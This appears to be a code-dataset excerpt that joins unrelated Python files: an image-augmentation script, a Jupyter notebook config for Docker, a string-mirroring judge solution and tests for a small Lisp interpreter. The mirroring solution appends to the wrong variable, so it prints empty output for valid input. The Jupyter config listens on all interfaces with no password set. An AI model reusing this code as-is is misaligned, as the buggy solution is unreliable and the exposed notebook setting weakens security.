cv2.imwrite(image_path, new_img)
with open(record_path, 'w') as outfile:
json.dump(new_data, outfile)
# TODO: better place for global stuff
HISTORY_LENGTH = 50
current_history_length = 0
history_buffer = {}
def gen_history_meta(old_meta):
meta_with_history = copy.deepcopy(old_meta)
for input_key in old_meta['inputs']:
meta_with_history['inputs'].append('history/%s' % input_key)
for type_key in old_meta['types']:
meta_with_history['types'].append('%s_array' % type_key)
return meta_with_history
def augment_history(img, data):
global current_history_length
global history_buffer
data_with_history = copy.deepcopy(data)
data_keys = data.keys()
for key in data_keys:
if (key not in history_buffer):
history_buffer[key] = deque(maxlen=HISTORY_LENGTH)
history_buffer[key].append(data[key])
current_history_length += 1
if (current_history_length < HISTORY_LENGTH):
return (None, None)
# TODO: this includes also the current value
for key in data_keys:
history_key = 'history/%s' % key
data_with_history[history_key] = list(history_buffer[key])
return (img, data_with_history)
def aug_flip(inputs, outputs):
img = inputs[0]
img = cv2.flip(img, 1)
augmented_outputs = [-outputs[0], outputs[1]]
augmented_inputs = copy.deepcopy(inputs)
augmented_inputs[0] = img
return augmented_inputs, augmented_outputs
def aug_brightness(inputs, outputs):
img = inputs[0]
img = cv2.cvtColor(img,cv2.COLOR_BGR2HSV)
img = np.array(img, dtype = np.float64)
random_bright = .5+np.random.uniform()
img[:,:,2] = img[:,:,2]*random_bright
img[:,:,2][img[:,:,2]>255] = 255
img = np.array(img, dtype = np.uint8)
img = cv2.cvtColor(img, cv2.COLOR_HSV2BGR)
augmented_inputs = copy.deepcopy(inputs)
augmented_inputs[0] = img
return augmented_inputs, outputs
def aug_shadow(inputs, outputs):
img = inputs[0]
top_y = 320 * np.random.uniform()
top_x = 0
bot_x = 160
bot_y = 320 * np.random.uniform()
image_hls = cv2.cvtColor(img, cv2.COLOR_BGR2HLS)
shadow_mask = 0 * image_hls[:, :, 1]
X_m = np.mgrid[0:img.shape[0], 0:img.shape[1]][0]
Y_m = np.mgrid[0:img.shape[0], 0:img.shape[1]][1]
shadow_mask[((X_m - top_x) * (bot_y - top_y) - (bot_x - top_x) * (Y_m - top_y) >= 0)] = 1
# random_bright = .25+.7*np.random.uniform()
if np.random.randint(2) == 1:
random_bright = .5
cond1 = shadow_mask == 1
cond0 = shadow_mask == 0
if np.random.randint(2) == 1:
image_hls[:, :, 1][cond1] = image_hls[:, :, 1][cond1] * random_bright
else:
image_hls[:, :, 1][cond0] = image_hls[:, :, 1][cond0] * random_bright
img = cv2.cvtColor(image_hls, cv2.COLOR_HLS2BGR)
augmented_inputs = copy.deepcopy(inputs)
augmented_inputs[0] = img
return augmented_inputs, outputs
def aug_shadow2(inputs, outputs):
img = cv2.cvtColor(inputs[0],cv2.COLOR_BGR2HSV)
img = cv2.cvtColor(img,cv2.COLOR_HSV2BGR)
top_y = 320 * np.random.uniform()
top_x = 0
bot_x = 160
bot_y = 320 * np.random.uniform()
image_hls = cv2.cvtColor(img, cv2.COLOR_BGR2HLS)
shadow_mask = image_hls[:, :, 1] * 0
X_m = np.mgrid[0:img.shape[0], 0:img.shape[1]][0]
Y_m = np.mgrid[0:img.shape[0], 0:img.shape[1]][1]
shadow_mask[((X_m - top_x) * (bot_y - top_y) - (bot_x - top_x) * (Y_m - top_y) >= 0)] = 1
# random_bright = .25+.7*np.random.uniform()
#if np.random.randint(2) == 1:
random_bright = .4
random_bright2 = .2
cond = shadow_mask == np.random.randint(2)
image_hls[:, :, 0][cond] = image_hls[:, :, 0][cond] * random_bright
image_hls[:, :, 1][cond] = image_hls[:, :, 1][cond] * random_bright
image_hls[:, :, 2][cond] = image_hls[:, :, 2][cond] * random_bright2
img = cv2.cvtColor(image_hls, cv2.COLOR_HLS2BGR)
augmented_inputs = copy.deepcopy(inputs)
augmented_inputs[0] = img
return augmented_inputs, outputs
def augment_flip(img, data):
data = copy.deepcopy(data)
img = cv2.flip(img, 1)
flip_keys = [
'user/angle',
#'acceleration/y',
#'gyro/y',
'history/user/angle',
#'history/acceleration/y',
#'history/gyro/y'
]
for key in flip_keys:
if (isinstance(data[key], list)):
flipped_list = list(map(lambda value: 0 - value, data[key]))
data[key] = flipped_list
else:
data[key] = 0 - data[key]
# Sonar values have to be switched
#old_sonar_left = data['sonar/left']
#data['sonar/left'] = data['sonar/right']
#data['sonar/right'] = old_sonar_left
#old_sonar_history_left = data['history/sonar/left']
#data['history/sonar/left'] = data['history/sonar/right']
#data['history/sonar/right'] = old_sonar_history_left
return (img, data)
def augment_brightness(img, data):
img = cv2.cvtColor(img,cv2.COLOR_BGR2HSV)
img = np.array(img, dtype = np.float64)
random_bright = .2+np.random.uniform()
img[:,:,2] = img[:,:,2]*random_bright
img[:,:,2][img[:,:,2]>255] = 255
img = np.array(img, dtype = np.uint8)
img = cv2.cvtColor(img,cv2.COLOR_HSV2BGR)
return (img, data)
def augment_shadow(img, data):
top_y = 320 * np.random.uniform()
top_x = 0
bot_x = 160
bot_y = 320 * np.random.uniform()
image_hls = cv2.cvtColor(img, cv2.COLOR_BGR2HLS)
shadow_mask = 0 * image_hls[:, :, 1]
X_m = np.mgrid[0:img.shape[0], 0:img.shape[1]][0]
Y_m = np.mgrid[0:img.shape[0], 0:img.shape[1]][1]
shadow_mask[((X_m - top_x) * (bot_y - top_y) - (bot_x - top_x) * (Y_m - top_y) >= 0)] = 1
# random_bright = .25+.7*np.random.uniform()
if np.random.randint(2) == 1:
random_bright = .5
cond1 = shadow_mask == 1
cond0 = shadow_mask == 0
if np.random.randint(2) == 1:
image_hls[:, :, 1][cond1] = image_hls[:, :, 1][cond1] * random_bright
else:
image_hls[:, :, 1][cond0] = image_hls[:, :, 1][cond0] * random_bright
img = cv2.cvtColor(image_hls, cv2.COLOR_HLS2BGR)
return (img, data)
#
# customer defined functions
#
# gaussian blur
def augment_gaussian_blur(img, data):
gauss= ImgGaussianBlur()
img = gauss.run(img)
return (img, data)
# threshold
def augment_threshold(img, data):
threshold = ImgThreshold()
img = threshold.img_threshold(img)
return (img, data)
#
augment_style_alpha = 0.1
augment_style_gpu_enabled = 0
# style augmentation
def augment_style(img, data):
style = ImgStyleAug()
img = style.img_style(img,augment_style_alpha,augment_style_gpu_enabled)
return (img, data)
# canny
def augment_canny(img, data):
canny = ImgCanny()
img = canny.run(img)
return (img, data)
def augment(target, out = None, method_args='all',gpu_enabled=0):
print('Start augmentation')
records = glob.glob('%s/record*.json' % target)
records = ((int(re.search('.+_(\d+).json', path).group(1)), path) for path in records)
# Directories starting with underscore are skipped in training. Originals have no history augmented so have to be skipped
size, init_path = initialize_records(records, target, out, "_original")
count = size
if not out:
out = target
print(' Augmenting %d records from "%s". Target folder: "%s"' % (count, target, out))
if target is not out:
print(' Original files copies to "%s"', init_path)
print(' -------------------------------------------------')
if 'all' in method_args or 'classic' in method_args:
size, history_path = augmentation_round(init_path, out, count, 'history', augment_history, gen_history_meta)
count = count + size
size, flipped_path = augmentation_round(history_path, out, count, 'flipped', augment_flip)
count = count + size
size, bright_path = augmentation_round(flipped_path, out, count, 'bright', augment_brightness)
count = count + size
size, shadow_path = augmentation_round(bright_path, out, count, 'shadow', augment_shadow)
count = count + size
if 'all' in method_args or 'gaussian' in method_args:
size, gaussian_path = augmentation_round(init_path, out, count, 'gaussian_blur', augment_gaussian_blur)
count = count + size
if 'all' in method_args or 'threshold' in method_args:
size, threshold = augmentation_round(init_path, out, count, 'threshold', augment_threshold)
count = count + size
if 'all' in method_args or 'canny' in method_args:
size, canny = augmentation_round(init_path, out, count, 'canny', augment_canny)
count = count + size
if 'all' in method_args or 'style_aug' in method_args:
global augment_style_alpha
global augment_style_gpu_enabled
if gpu_enabled:
augment_style_gpu_enabled = 1
augment_style_alpha = 0.1
size, style = augmentation_round(init_path, out, count, 'style_aug_01', augment_style)
count = count + size
augment_style_alpha = 0.5
size, style = augmentation_round(init_path, out, count, 'style_aug05', augment_style)
count = count + size
print(' -------------------------------------------------')
print('Augmentation done. Total records %s.' % count)
def is_empty(dir):
return not os.listdir(dir)
if __name__ == '__main__':
args = docopt(__doc__)
target_path = args['--path']
out_path = args['--out']
method = args['--method']
method_args = 'all'
gpu_enabled_args = args['--gpu_enabled']
if out_path:
ensure_directory(out_path)
if method:
method_args = method
if gpu_enabled_args=='1':
gpu_enabled = 1
else:
gpu_enabled = 0
print(gpu_enabled)
#sys.exit(0)
if out_path and target_path is not out_path and not is_empty(out_path):
print(' Target folder "%s" must be empty' % out_path)
else:
augment(target_path, out_path,method_args,gpu_enabled)
| [
"juan.furiaz88@gmail.com"
] | juan.furiaz88@gmail.com |
c5cd9803310de08be4dfccdbf91203ea1335033c | e6e9efdce3418812d612630c770e985c0a5ff627 | /conf/jupyter_notebook_config.py | a4ddf9bf562014f2d622ee0843703f427353a3bb | [] | no_license | JamesDommisse/JupyterDocker | 0310f5b57c32492286890fa53044bca8b4866db3 | ad9a2e887e887559665c796798eca45315425d14 | refs/heads/master | 2021-01-15T15:32:37.179709 | 2016-08-24T21:54:32 | 2016-08-24T21:54:32 | 65,316,429 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21,236 | py | # Configuration file for jupyter-notebook.
#------------------------------------------------------------------------------
# Configurable configuration
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
# LoggingConfigurable configuration
#------------------------------------------------------------------------------
# A parent class for Configurables that log.
#
# Subclasses have a log trait, and the default behavior is to get the logger
# from the currently running Application.
#------------------------------------------------------------------------------
# SingletonConfigurable configuration
#------------------------------------------------------------------------------
# A configurable that only allows one instance.
#
# This class is for classes that should only have one instance of itself or
# *any* subclass. To create and retrieve such a class use the
# :meth:`SingletonConfigurable.instance` method.
#------------------------------------------------------------------------------
# Application configuration
#------------------------------------------------------------------------------
# This is an application.
# The date format used by logging formatters for %(asctime)s
# c.Application.log_datefmt = '%Y-%m-%d %H:%M:%S'
# The Logging format template
# c.Application.log_format = '[%(name)s]%(highlevel)s %(message)s'
# Set the log level by value or name.
# c.Application.log_level = 30
#------------------------------------------------------------------------------
# JupyterApp configuration
#------------------------------------------------------------------------------
# Base class for Jupyter applications
# Answer yes to any prompts.
# c.JupyterApp.answer_yes = False
# Full path of a config file.
# c.JupyterApp.config_file = ''
# Specify a config file to load.
# c.JupyterApp.config_file_name = ''
# Generate default config file.
# c.JupyterApp.generate_config = False
#------------------------------------------------------------------------------
# NotebookApp configuration
#------------------------------------------------------------------------------
# Set the Access-Control-Allow-Credentials: true header
# c.NotebookApp.allow_credentials = False
# Set the Access-Control-Allow-Origin header
#
# Use '*' to allow any origin to access your server.
#
# Takes precedence over allow_origin_pat.
# c.NotebookApp.allow_origin = ''
# Use a regular expression for the Access-Control-Allow-Origin header
#
# Requests from an origin matching the expression will get replies with:
#
# Access-Control-Allow-Origin: origin
#
# where `origin` is the origin of the request.
#
# Ignored if allow_origin is set.
# c.NotebookApp.allow_origin_pat = ''
# DEPRECATED use base_url
# c.NotebookApp.base_project_url = '/'
# The base URL for the notebook server.
#
# Leading and trailing slashes can be omitted, and will automatically be added.
# c.NotebookApp.base_url = '/'
# Specify what command to use to invoke a web browser when opening the notebook.
# If not specified, the default browser will be determined by the `webbrowser`
# standard library module, which allows setting of the BROWSER environment
# variable to override it.
# c.NotebookApp.browser = ''
# The full path to an SSL/TLS certificate file.
# c.NotebookApp.certfile = ''
# The full path to a certificate authority certifificate for SSL/TLS client
# authentication.
# c.NotebookApp.client_ca = ''
# The config manager class to use
# c.NotebookApp.config_manager_class = 'notebook.services.config.manager.ConfigManager'
# The notebook manager class to use.
# c.NotebookApp.contents_manager_class = 'notebook.services.contents.filemanager.FileContentsManager'
# Extra keyword arguments to pass to `set_secure_cookie`. See tornado's
# set_secure_cookie docs for details.
# c.NotebookApp.cookie_options = {}
# The random bytes used to secure cookies. By default this is a new random
# number every time you start the Notebook. Set it to a value in a config file
# to enable logins to persist across server sessions.
#
# Note: Cookie secrets should be kept private, do not share config files with
# cookie_secret stored in plaintext (you can read the value from a file).
# c.NotebookApp.cookie_secret = b''
# The file where the cookie secret is stored.
# c.NotebookApp.cookie_secret_file = ''
# The default URL to redirect to from `/`
# c.NotebookApp.default_url = '/tree'
# Whether to enable MathJax for typesetting math/TeX
#
# MathJax is the javascript library Jupyter uses to render math/LaTeX. It is
# very large, so you may want to disable it if you have a slow internet
# connection, or for offline use of the notebook.
#
# When disabled, equations etc. will appear as their untransformed TeX source.
# c.NotebookApp.enable_mathjax = True
# extra paths to look for Javascript notebook extensions
# c.NotebookApp.extra_nbextensions_path = []
# Extra paths to search for serving static files.
#
# This allows adding javascript/css to be available from the notebook server
# machine, or overriding individual files in the IPython
# c.NotebookApp.extra_static_paths = []
# Extra paths to search for serving jinja templates.
#
# Can be used to override templates from notebook.templates.
# c.NotebookApp.extra_template_paths = []
#
# c.NotebookApp.file_to_run = ''
# Use minified JS file or not, mainly use during dev to avoid JS recompilation
# c.NotebookApp.ignore_minified_js = False
# (bytes/sec) Maximum rate at which messages can be sent on iopub before they
# are limited.
# c.NotebookApp.iopub_data_rate_limit = 0
# (msg/sec) Maximum rate at which messages can be sent on iopub before they are
# limited.
# c.NotebookApp.iopub_msg_rate_limit = 0
# The IP address the notebook server will listen on.
c.NotebookApp.ip = '0.0.0.0'
# Supply extra arguments that will be passed to Jinja environment.
# c.NotebookApp.jinja_environment_options = {}
# Extra variables to supply to jinja templates when rendering.
# c.NotebookApp.jinja_template_vars = {}
# The kernel manager class to use.
# c.NotebookApp.kernel_manager_class = 'notebook.services.kernels.kernelmanager.MappingKernelManager'
# The kernel spec manager class to use. Should be a subclass of
# `jupyter_client.kernelspec.KernelSpecManager`.
#
# The Api of KernelSpecManager is provisional and might change without warning
# between this version of Jupyter and the next stable one.
# c.NotebookApp.kernel_spec_manager_class = 'jupyter_client.kernelspec.KernelSpecManager'
# The full path to a private key file for usage with SSL/TLS.
# c.NotebookApp.keyfile = ''
# The login handler class to use.
# c.NotebookApp.login_handler_class = 'notebook.auth.login.LoginHandler'
# The logout handler class to use.
# c.NotebookApp.logout_handler_class = 'notebook.auth.logout.LogoutHandler'
# The url for MathJax.js.
# c.NotebookApp.mathjax_url = ''
# Dict of Python modules to load as notebook server extensions.Entry values can
# be used to enable and disable the loading ofthe extensions.
# c.NotebookApp.nbserver_extensions = {}
# The directory to use for notebooks and kernels.
# c.NotebookApp.notebook_dir = ''
# Whether to open in a browser after starting. The specific browser used is
# platform dependent and determined by the python standard library `webbrowser`
# module, unless it is overridden using the --browser (NotebookApp.browser)
# configuration option.
c.NotebookApp.open_browser = False
# Hashed password to use for web authentication.
#
# To generate, type in a python/IPython shell:
#
# from notebook.auth import passwd; passwd()
#
# The string should be of the form type:salt:hashed-password.
# c.NotebookApp.password = ''
# The port the notebook server will listen on.
c.NotebookApp.port = 8888
# The number of additional ports to try if the specified port is not available.
# c.NotebookApp.port_retries = 50
# DISABLED: use %pylab or %matplotlib in the notebook to enable matplotlib.
# c.NotebookApp.pylab = 'disabled'
# (sec) Time window used to check the message and data rate limits.
# c.NotebookApp.rate_limit_window = 1.0
# Reraise exceptions encountered loading server extensions?
# c.NotebookApp.reraise_server_extension_failures = False
# DEPRECATED use the nbserver_extensions dict instead
# c.NotebookApp.server_extensions = []
# The session manager class to use.
# c.NotebookApp.session_manager_class = 'notebook.services.sessions.sessionmanager.SessionManager'
# Supply SSL options for the tornado HTTPServer. See the tornado docs for
# details.
# c.NotebookApp.ssl_options = {}
# Supply overrides for the tornado.web.Application that the Jupyter notebook
# uses.
# c.NotebookApp.tornado_settings = {}
# Whether to trust or not X-Scheme/X-Forwarded-Proto and X-Real-Ip/X-Forwarded-
# For headerssent by the upstream reverse proxy. Necessary if the proxy handles
# SSL
# c.NotebookApp.trust_xheaders = False
# DEPRECATED, use tornado_settings
# c.NotebookApp.webapp_settings = {}
# The base URL for websockets, if it differs from the HTTP server (hint: it
# almost certainly doesn't).
#
# Should be in the form of an HTTP origin: ws[s]://hostname[:port]
# c.NotebookApp.websocket_url = ''
#------------------------------------------------------------------------------
# ConnectionFileMixin configuration
#------------------------------------------------------------------------------
# Mixin for configurable classes that work with connection files
# JSON file in which to store connection info [default: kernel-<pid>.json]
#
# This file will contain the IP, ports, and authentication key needed to connect
# clients to this kernel. By default, this file will be created in the security
# dir of the current profile, but can be specified by absolute path.
# c.ConnectionFileMixin.connection_file = ''
# set the control (ROUTER) port [default: random]
# c.ConnectionFileMixin.control_port = 0
# set the heartbeat port [default: random]
# c.ConnectionFileMixin.hb_port = 0
# set the iopub (PUB) port [default: random]
# c.ConnectionFileMixin.iopub_port = 0
# Set the kernel's IP address [default localhost]. If the IP address is
# something other than localhost, then Consoles on other machines will be able
# to connect to the Kernel, so be careful!
# c.ConnectionFileMixin.ip = ''
# set the shell (ROUTER) port [default: random]
# c.ConnectionFileMixin.shell_port = 0
# set the stdin (ROUTER) port [default: random]
# c.ConnectionFileMixin.stdin_port = 0
#
# c.ConnectionFileMixin.transport = 'tcp'
#------------------------------------------------------------------------------
# KernelManager configuration
#------------------------------------------------------------------------------
# Manages a single kernel in a subprocess on this host.
#
# This version starts kernels with Popen.
# Should we autorestart the kernel if it dies.
# c.KernelManager.autorestart = True
# DEPRECATED: Use kernel_name instead.
#
# The Popen Command to launch the kernel. Override this if you have a custom
# kernel. If kernel_cmd is specified in a configuration file, Jupyter does not
# pass any arguments to the kernel, because it cannot make any assumptions about
# the arguments that the kernel understands. In particular, this means that the
# kernel does not receive the option --debug if it given on the Jupyter command
# line.
# c.KernelManager.kernel_cmd = []
#------------------------------------------------------------------------------
# Session configuration
#------------------------------------------------------------------------------
# Object for handling serialization and sending of messages.
#
# The Session object handles building messages and sending them with ZMQ sockets
# or ZMQStream objects. Objects can communicate with each other over the
# network via Session objects, and only need to work with the dict-based IPython
# message spec. The Session will handle serialization/deserialization, security,
# and metadata.
#
# Sessions support configurable serialization via packer/unpacker traits, and
# signing with HMAC digests via the key/keyfile traits.
#
# Parameters ----------
#
# debug : bool
# whether to trigger extra debugging statements
# packer/unpacker : str : 'json', 'pickle' or import_string
# importstrings for methods to serialize message parts. If just
# 'json' or 'pickle', predefined JSON and pickle packers will be used.
# Otherwise, the entire importstring must be used.
#
# The functions must accept at least valid JSON input, and output *bytes*.
#
# For example, to use msgpack:
# packer = 'msgpack.packb', unpacker='msgpack.unpackb'
# pack/unpack : callables
# You can also set the pack/unpack callables for serialization directly.
# session : bytes
# the ID of this Session object. The default is to generate a new UUID.
# username : unicode
# username added to message headers. The default is to ask the OS.
# key : bytes
# The key used to initialize an HMAC signature. If unset, messages
# will not be signed or checked.
# keyfile : filepath
# The file containing a key. If this is set, `key` will be initialized
# to the contents of the file.
# Threshold (in bytes) beyond which an object's buffer should be extracted to
# avoid pickling.
# c.Session.buffer_threshold = 1024
# Whether to check PID to protect against calls after fork.
#
# This check can be disabled if fork-safety is handled elsewhere.
# c.Session.check_pid = True
# Threshold (in bytes) beyond which a buffer should be sent without copying.
# c.Session.copy_threshold = 65536
# Debug output in the Session
# c.Session.debug = False
# The maximum number of digests to remember.
#
# The digest history will be culled when it exceeds this value.
# c.Session.digest_history_size = 65536
# The maximum number of items for a container to be introspected for custom
# serialization. Containers larger than this are pickled outright.
# c.Session.item_threshold = 64
# execution key, for signing messages.
# c.Session.key = b''
# path to file containing execution key.
# c.Session.keyfile = ''
# Metadata dictionary, which serves as the default top-level metadata dict for
# each message.
# c.Session.metadata = {}
# The name of the packer for serializing messages. Should be one of 'json',
# 'pickle', or an import name for a custom callable serializer.
# c.Session.packer = 'json'
# The UUID identifying this session.
# c.Session.session = ''
# The digest scheme used to construct the message signatures. Must have the form
# 'hmac-HASH'.
# c.Session.signature_scheme = 'hmac-sha256'
# The name of the unpacker for unserializing messages. Only used with custom
# functions for `packer`.
# c.Session.unpacker = 'json'
# Username for the Session. Default is your system username.
# c.Session.username = 'james'
#------------------------------------------------------------------------------
# MultiKernelManager configuration
#------------------------------------------------------------------------------
# A class for managing multiple kernels.
# The name of the default kernel to start
# c.MultiKernelManager.default_kernel_name = 'python3'
# The kernel manager class. This is configurable to allow subclassing of the
# KernelManager for customized behavior.
# c.MultiKernelManager.kernel_manager_class = 'jupyter_client.ioloop.IOLoopKernelManager'
#------------------------------------------------------------------------------
# MappingKernelManager configuration
#------------------------------------------------------------------------------
# A KernelManager that handles notebook mapping and HTTP error handling
#
# c.MappingKernelManager.root_dir = ''
#------------------------------------------------------------------------------
# ContentsManager configuration
#------------------------------------------------------------------------------
# Base class for serving files and directories.
#
# This serves any text or binary file, as well as directories, with special
# handling for JSON notebook documents.
#
# Most APIs take a path argument, which is always an API-style unicode path, and
# always refers to a directory.
#
# - unicode, not url-escaped
# - '/'-separated
# - leading and trailing '/' will be stripped
# - if unspecified, path defaults to '',
# indicating the root path.
#
# c.ContentsManager.checkpoints = None
#
# c.ContentsManager.checkpoints_class = 'notebook.services.contents.checkpoints.Checkpoints'
#
# c.ContentsManager.checkpoints_kwargs = {}
# Glob patterns to hide in file and directory listings.
# c.ContentsManager.hide_globs = ['__pycache__', '*.pyc', '*.pyo', '.DS_Store', '*.so', '*.dylib', '*~']
# Python callable or importstring thereof
#
# To be called on a contents model prior to save.
#
# This can be used to process the structure, such as removing notebook outputs
# or other side effects that should not be saved.
#
# It will be called as (all arguments passed by keyword)::
#
# hook(path=path, model=model, contents_manager=self)
#
# - model: the model to be saved. Includes file contents.
# Modifying this dict will affect the file that is stored.
# - path: the API path of the save destination
# - contents_manager: this ContentsManager instance
# c.ContentsManager.pre_save_hook = None
# The base name used when creating untitled directories.
# c.ContentsManager.untitled_directory = 'Untitled Folder'
# The base name used when creating untitled files.
# c.ContentsManager.untitled_file = 'untitled'
# The base name used when creating untitled notebooks.
# c.ContentsManager.untitled_notebook = 'Untitled'
#------------------------------------------------------------------------------
# FileManagerMixin configuration
#------------------------------------------------------------------------------
# Mixin for ContentsAPI classes that interact with the filesystem.
#
# Provides facilities for reading, writing, and copying both notebooks and
# generic files.
#
# Shared by FileContentsManager and FileCheckpoints.
#
# Note ---- Classes using this mixin must provide the following attributes:
#
# root_dir : unicode
# A directory against against which API-style paths are to be resolved.
#
# log : logging.Logger
# By default notebooks are saved on disk on a temporary file and then if
# succefully written, it replaces the old ones. This procedure, namely
# 'atomic_writing', causes some bugs on file system whitout operation order
# enforcement (like some networked fs). If set to False, the new notebook is
# written directly on the old one which could fail (eg: full filesystem or quota
# )
# c.FileManagerMixin.use_atomic_writing = True
#------------------------------------------------------------------------------
# FileContentsManager configuration
#------------------------------------------------------------------------------
# Python callable or importstring thereof
#
# to be called on the path of a file just saved.
#
# This can be used to process the file on disk, such as converting the notebook
# to a script or HTML via nbconvert.
#
# It will be called as (all arguments passed by keyword)::
#
# hook(os_path=os_path, model=model, contents_manager=instance)
#
# - path: the filesystem path to the file just written - model: the model
# representing the file - contents_manager: this ContentsManager instance
# c.FileContentsManager.post_save_hook = None
#
# c.FileContentsManager.root_dir = ''
# DEPRECATED, use post_save_hook. Will be removed in Notebook 5.0
# c.FileContentsManager.save_script = False
#------------------------------------------------------------------------------
# NotebookNotary configuration
#------------------------------------------------------------------------------
# A class for computing and verifying notebook signatures.
# The hashing algorithm used to sign notebooks.
# c.NotebookNotary.algorithm = 'sha256'
# The number of notebook signatures to cache. When the number of signatures
# exceeds this value, the oldest 25% of signatures will be culled.
# c.NotebookNotary.cache_size = 65535
# The sqlite file in which to store notebook signatures. By default, this will
# be in your Jupyter data directory. You can set it to ':memory:' to disable
# sqlite writing to the filesystem.
# c.NotebookNotary.db_file = ''
# The secret key with which notebooks are signed.
# c.NotebookNotary.secret = b''
# The file where the secret key is stored.
# c.NotebookNotary.secret_file = ''
#------------------------------------------------------------------------------
# KernelSpecManager configuration
#------------------------------------------------------------------------------
# If there is no Python kernelspec registered and the IPython kernel is
# available, ensure it is added to the spec list.
# c.KernelSpecManager.ensure_native_kernel = True
# The kernel spec class. This is configurable to allow subclassing of the
# KernelSpecManager for customized behavior.
# c.KernelSpecManager.kernel_spec_class = 'jupyter_client.kernelspec.KernelSpec'
# Whitelist of allowed kernel names.
#
# By default, all installed kernels are allowed.
# c.KernelSpecManager.whitelist = set()
| [
"James.Dommisse@gmail.com"
] | James.Dommisse@gmail.com |
d2be3ec81f8f049e8a70a3c02bca4c7f5d207554 | 96e38b89fa057fa0c1cf34e498b4624041dfc6e2 | /BOJ/String/Python/4583.py | a995a37188226e83d4452414ace1a0952986cac9 | [] | no_license | malkoG/polyglot-cp | 66059246b01766da3c359dbd16f04348d3c7ecd2 | 584763144afe40d73e72dd55f90ee1206029ca8f | refs/heads/master | 2021-11-24T13:33:49.625237 | 2019-10-06T07:42:49 | 2019-10-06T07:42:49 | 176,255,722 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 409 | py | mirror=dict()
mirror['b'] = 'd'
mirror['d'] = 'b'
mirror['q'] = 'p'
mirror['p'] = 'q'
for ch in 'iovwx':
mirror[ch] = ch
while True:
s=input()
if s =="#":
break
result = ''
flag = True
for ch in s:
try:
s += mirror[ch]
except:
flag = False
break
if flag:
print(result)
else:
print("INVALID")
| [
"rijgndqw012@gmail.com"
] | rijgndqw012@gmail.com |
2a12294b3386cab34c9fd7340aa33088ecd84771 | 6345da7e3b648c5e0a2a4ed77a35a1a25066308d | /petit_lisp/test_petit.py | 7e892bde3ad6861f9701633bed4af7e613a569d6 | [] | no_license | aroberge/splore | 1550a5348162c110baceb877a2fd3045db78fbf5 | 34d97a19897bae48d9aed5f759589bf9bed1b7ef | refs/heads/master | 2021-10-11T06:05:45.253376 | 2021-10-10T19:23:48 | 2021-10-10T19:23:48 | 28,837,513 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 8,491 | py | ''' usage: python test_petit.py [v?]
optional argument: v? where ? is a number will use the petit_lisp.py version
located in v?/petit_lisp.py otherwise the default (final)
version will be used.
'''
import mock
import unittest
if __name__ == '__main__':
import sys
import os
if len(sys.argv) > 1 and sys.argv[1].startswith('v'):
sys.path.insert(0, os.path.join(os.getcwd(), sys.argv[1]))
try:
version = int(sys.argv[1][1:])
except ValueError:
version = float(sys.argv[1][1:])
sys.argv.pop(1)
import petit_lisp as pl
else:
version = 0
import petit_lisp as pl
# Since we focus on a read-eval-print loop version, we only test the main
# parts of the interpreter ("read", "parse", "eval") and do not
# test the helper functions, which leaves us with the flexibility to
# change them as the design evolves and still have non-failing tests
# for all versions.
class TestRead(unittest.TestCase):
'''Ensures that we handle user input correctly'''
@mock.patch('builtins.input', return_value="(a b c)")
def test_get_expr_all_at_once(self, input):
self.assertEqual("(a b c)", pl.read_expression())
@unittest.skipIf(0 < version < 2, '')
@mock.patch('builtins.input', side_effect=['(a', 'b', 'c)'])
def test_get_expr_in_parts(self, input):
self.assertEqual("(a b c)", pl.read_expression())
class TestParse(unittest.TestCase):
'''Ensures that we parse expressions correctly, transforming them into
the appropriate "list of lists" representation'''
def test_parse_add(self):
self.assertEqual(['+', 3, 4], pl.parse("(+ 3 4)"), msg="basic")
self.assertEqual(['+', 3, 4], pl.parse(" ( + 3 4 ) "), msg="extra spaces")
def test_parse_add_more(self):
self.assertEqual(['+', 3, 4, 5], pl.parse(" ( + 3 4 5)"), msg="more args")
@unittest.skipIf(0 < version < 3, '')
def test_parse_two_levels(self):
self.assertEqual(['*', ['+', 3, 4], ['-', 2, 1]], pl.parse(" (* ( + 3 4) (- 2 1))"))
class TestEvaluate(unittest.TestCase):
'''Evaluate expressions, using the parse function as a first step'''
def test_add(self):
self.assertEqual(7, pl.evaluate(pl.parse("(+ 3 4)")))
@unittest.skipIf(0 < version < 2, '')
def test_add_floats(self):
self.assertEqual(7.75, pl.evaluate(pl.parse("(+ 3.25 4.5)")))
@unittest.skipIf(0 < version < 2, '')
def test_sub(self):
self.assertEqual(1, pl.evaluate(pl.parse("(- 4 3)")))
self.assertEqual(-1, pl.evaluate(pl.parse("(- 3 4)")))
def test_add_many(self):
self.assertEqual(12, pl.evaluate(pl.parse("(+ 3 4 5)")))
@unittest.skipIf(0 < version < 2, '')
def test_mul(self):
self.assertEqual(12, pl.evaluate(pl.parse("(* 3 4)")))
self.assertEqual(2.4, pl.evaluate(pl.parse("(* 0.6 4)")))
@unittest.skipIf(0 < version < 2, 'multiple args for mul')
def test_mul_many(self):
self.assertEqual(60, pl.evaluate(pl.parse("(* 3 4 5)")))
@unittest.skipIf(0 < version < 2, '')
def test_div(self):
self.assertEqual(2.0, pl.evaluate(pl.parse("(/ 8 4)")))
@unittest.skipIf(0 < version < 2, '')
def test_floor_div(self):
self.assertEqual(2, pl.evaluate(pl.parse("(// 8 4)")))
self.assertEqual(2, pl.evaluate(pl.parse("(// 9.1 4)")))
@unittest.skipIf(0 < version < 3, '')
def test_parse_two_levels(self):
self.assertEqual(13, pl.evaluate(pl.parse(" (+ (* 3 4) (- 2 1))")))
@unittest.skipIf(0 < version < 3, '')
def test_parse_three_levels(self):
self.assertEqual(6, pl.evaluate(pl.parse("(// (+ (* 3 4) (- 2 1)) 2)")))
@unittest.skipIf(0 < version < 4, '')
def test_define(self):
self.assertEqual(None, pl.evaluate(pl.parse("(define x 3)")))
self.assertEqual(7, pl.evaluate(pl.parse("(+ x 4)")))
self.assertEqual(3, pl.evaluate(pl.parse("x")))
@unittest.skipIf(0 < version < 4, '')
def test_set(self):
self.assertEqual(None, pl.evaluate(pl.parse("(define x 3)")))
self.assertEqual(3, pl.evaluate(pl.parse("x")))
self.assertEqual(None, pl.evaluate(pl.parse("(set! x 4)")))
self.assertEqual(8, pl.evaluate(pl.parse("(+ x 4)")))
@unittest.skipIf(0 < version < 5, '')
def test_lambda(self):
self.assertEqual(None, pl.evaluate(pl.parse("(define square (lambda (x) (* x x)))")))
self.assertEqual(9, pl.evaluate(pl.parse("(square 3)")))
